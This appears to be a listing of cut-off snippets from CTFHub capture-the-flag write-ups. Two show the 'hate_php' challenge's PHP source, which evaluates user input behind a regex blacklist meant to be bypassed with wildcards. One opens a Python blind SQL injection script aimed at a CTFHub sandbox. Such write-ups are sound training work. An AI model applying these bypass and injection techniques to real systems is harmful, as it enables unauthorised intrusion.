CTFHub_2021-津门杯-Web-hate_php(通配符绕过正则匹配) 2021-第五届世界智能大会-「津门杯」国际网络安全创新大赛-Web-hate_php 打开场景,显示源代码 <?phperror_reporting(0);if(!isset($_GET['code'])){highlight_file(__FILE__); }else{$code=$_GET['code'];if(preg_match("/[A-Za-z0-9_$@...
靶场环境:https://www.ctfhub.com/#/challenge上面搜索hate 打开网页: <?php error_reporting(0);if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code= $_GET['code'];if(preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die...
代码 """ctfhub hatenum 盲注脚本"""import requestsfrom loguru import loggertarget = "http://challenge-732f479a63a3f952.sandbox.ctfhub.com:10800/login.php"s = requests.session()code_column_length = 0def guess_length():"""猜解 code 字段长度:return:"""global code_column_lengthfor x in ...